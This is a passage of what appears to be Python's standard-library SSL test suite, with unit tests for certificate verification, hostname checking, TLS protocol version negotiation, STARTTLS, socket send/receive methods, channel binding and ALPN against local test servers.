with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raises ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server, \
socket.socket() as sock, \
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on an SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client waits until the server is set up, then performs a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1')
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peer's version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
